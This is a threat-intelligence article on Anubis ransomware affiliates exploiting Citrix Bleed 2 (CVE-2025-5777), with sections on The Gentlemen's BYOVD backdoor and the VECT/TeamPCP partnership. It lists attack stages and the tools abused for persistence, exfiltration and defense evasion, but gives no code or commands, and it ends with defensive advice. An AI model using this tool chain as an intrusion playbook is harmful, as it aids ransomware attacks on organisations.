Exploits

Anubis Ransomware Exploits Citrix Bleed 2 for Initial Access

Published  ·  6 min read

The Anubis Ransomware Campaigns are known to exploit the Citrix Bleed 2 Vulnerability as an  initial access vector. The Citrix Bleed 2 Vulnerability is alternatively referred to as CVE-2025-5777 and it carries a CVSS score of 9.3.

The attacks follow a familiar pattern. Affiliates use legitimate remote access tools, steal credentials, move laterally, and deploy ransomware. But the details reveal how ransomware operations are becoming more industrialized.

Arctic Wolf documented the campaign. The firm found that affiliates repeatedly abused legitimate remote access tools to blend in with normal IT activity while maintaining control of victim systems.

Who Is Anubis?

Anubis is a ransomware-as-a-service group that emerged in late 2024 as a rebrand of Sphinx. The operation was formally announced on the RAMP underground forum in February 2025.

The group has claimed 91 victims on its data leak site. Eleven victims were reported in June 2026 alone. Targets range from healthcare to business services, manufacturing, technology, and financial services sectors. More than half of the targets are drawn from the U.S., followed by the U.K., Australia, France, and Canada.

Anubis has generous payment programs that reward its affiliates 80% of the ransoms paid. It also includes an irreversible data-wiping feature that ups the pressure on victims. When the wipe module is activated, files remain in directories but are reduced to zero bytes. Knowing threat actors can revert environments to that scorched-earth state significantly increases pressure on victims to pay before the wiper is fully activated.

The Attack Chain

The Anubis ransomware Citrix Bleed 2 exploitation campaign involves multiple stages.

Initial Access:

Access is gained by using the following two methods:
1. CVE-2025-5777 vulnerability in Citrix NetScaler ADC and Gateway
2. Secure VPN logon credentials obtained through multiple sources

It is not clear where the credentials for the VPN came from. The credentials can be obtained via prior compromise, initial access providers, credential stuffing, or information stealers. Valid Cisco AnyConnect logons were seen using different hosting ASNs.

Post Exploitation:

The post-exploitation process involves gaining entry via RDP and SMB and then using this entry point for credential access, PsExec service creation, RMM deployment, and cloud transfer.

Lateral Movement:

The lateral movement is performed by using RDP and PsExec. The RMM tools installed by the attackers are used to ensure their persistence, which includes ScreenConnect, Zoho Assist, MeshAgent, Remotely, UltraVNC, and Total Software Deployment. At times, the Cloudflare Tunnel is configured to make secure tunnels.

Credential Access and Exfiltration:

Attackers obtain credentials to aid access.Certain software such as S3 Browser, rclone, s5cmd, WinSCP and PuTTY is installed for purposes of data exfiltration before the ransomware attack.

Defense Evasion:

Strategies are employed to hinder system defenses and make investigations difficult after the incident.Windows defender real-time protection, SophosUninstall, PCHunter, and log deletion on several machines are some of the activities involved.

In at least one intrusion, the Anubis encryptor was deleted after execution, reducing the availability of on-disk payload artifacts for later analysis.

The Gentlemen's BYOVD Arsenal

The use of the Go backdoor by The Gentlemen ransomware-as-a-service was explained by Kaspersky. The backdoor is capable of remote command execution after reconnaissance, lateral movements using Group Policy or PsExec, and evasion of defenses using BYOVD.

The implant collects system information and exfiltrates it over a bidirectional TCP connection. It awaits operator responses that are executed using cmd.exe. A SOCKS proxy connection is also available.

According to Expel, The Gentlemen has also weaponized a zero-day vulnerability in a little-known third-party vendor driver called ktapi.sys. The driver is part of an API developed by Kontron. It grants kernel-level access, bypasses Windows security protections, and kills protected security processes associated with Microsoft, ESET, Palo Alto Networks, and SentinelOne.

Marcus Hutchins, principal threat researcher at Expel, noted: "BYOVD continues to be a huge threat to enterprises, enabling attackers to disable state-of-the-art endpoint security systems in seconds. Even using the latest Windows version, with all exploit mitigations enabled, does not provide complete protection."

The VECT and TeamPCP Partnership

Sophos investigated the partnership between VECT and TeamPCP. The alliance was announced in March 2026 to combine supply chain attack-driven credential theft with ransomware deployment.

The partnership allows VECT to deploy ransomware across all organizations compromised in the Trivy and LiteLLM supply chain attacks. Prior to the VECT partnership, TeamPCP was running another ransomware operation under the CipherForce brand.

Recent analyses found VECT to contain implementation flaws that cause any file larger than 128 KB to be permanently destroyed rather than encrypted. TeamPCP responded, stating they had never used VECT's encryptor in attacks.

Sophos noted that the VECT/TeamPCP alliance represents a meaningful shift in the ransomware threat landscape. The convergence of large-scale supply chain credential theft, a maturing RaaS operation, and mass underground forum mobilization constitutes an unprecedented model of industrialized ransomware deployment.

The Bottom Line

The Anubis ransomware Citrix Bleed 2 exploitation campaign  is a case in point that shows how ransomware operations are becoming increasingly sophisticated, combining exploits, legitimate tools, credential harvesting, and defense evasion.

Patch Citrix NetScaler. Monitor for RMM tool abuse. Audit VPN logins. And remember: the ransomware group with a built-in wiper doesn't need your cooperation. It just needs access.

FAQ Section

What is the Anubis ransomware Citrix Bleed 2 exploitation?

It is a campaign where Anubis affiliates exploit CVE-2025-5777 in Citrix NetScaler ADC and Gateway to gain initial access before deploying ransomware.

What is Citrix Bleed 2?

Citrix Bleed 2 is CVE-2025-5777, a critical authentication bypass vulnerability in Citrix NetScaler ADC and Gateway, CVSS score being 9.3.

How do Anubis affiliates achieve initial access?

They abuse either CVE-2025-5777 or valid credentials for a company's VPN provided by an initial access broker, through credential stuffing or information stealers.

What legitimate tools do attackers abuse?

Attackers abuse RMM tools including ScreenConnect, Zoho Assist, MeshAgent, Remotely, UltraVNC, and Total Software Deployment.

What is the wiper feature in Anubis?

Anubis includes a /WIPEMODE module that reduces files to 0 KB regardless of ransom payment. This increases pressure on victims to pay before the wiper is fully activated.

What is the VECT and TeamPCP partnership?

It is an alliance to combine supply chain credential theft with ransomware deployment. TeamPCP previously operated under the CipherForce brand.

Source: The Hacker News
Professional Services

Explore Our Cybersecurity Services

Our insights are backed by hands-on service delivery. If your business needs professional cybersecurity support, our UK-based specialists are ready to help.

© 2016 – 2026 Red Secure Tech Ltd. Registered in England and Wales — Company No: 15581067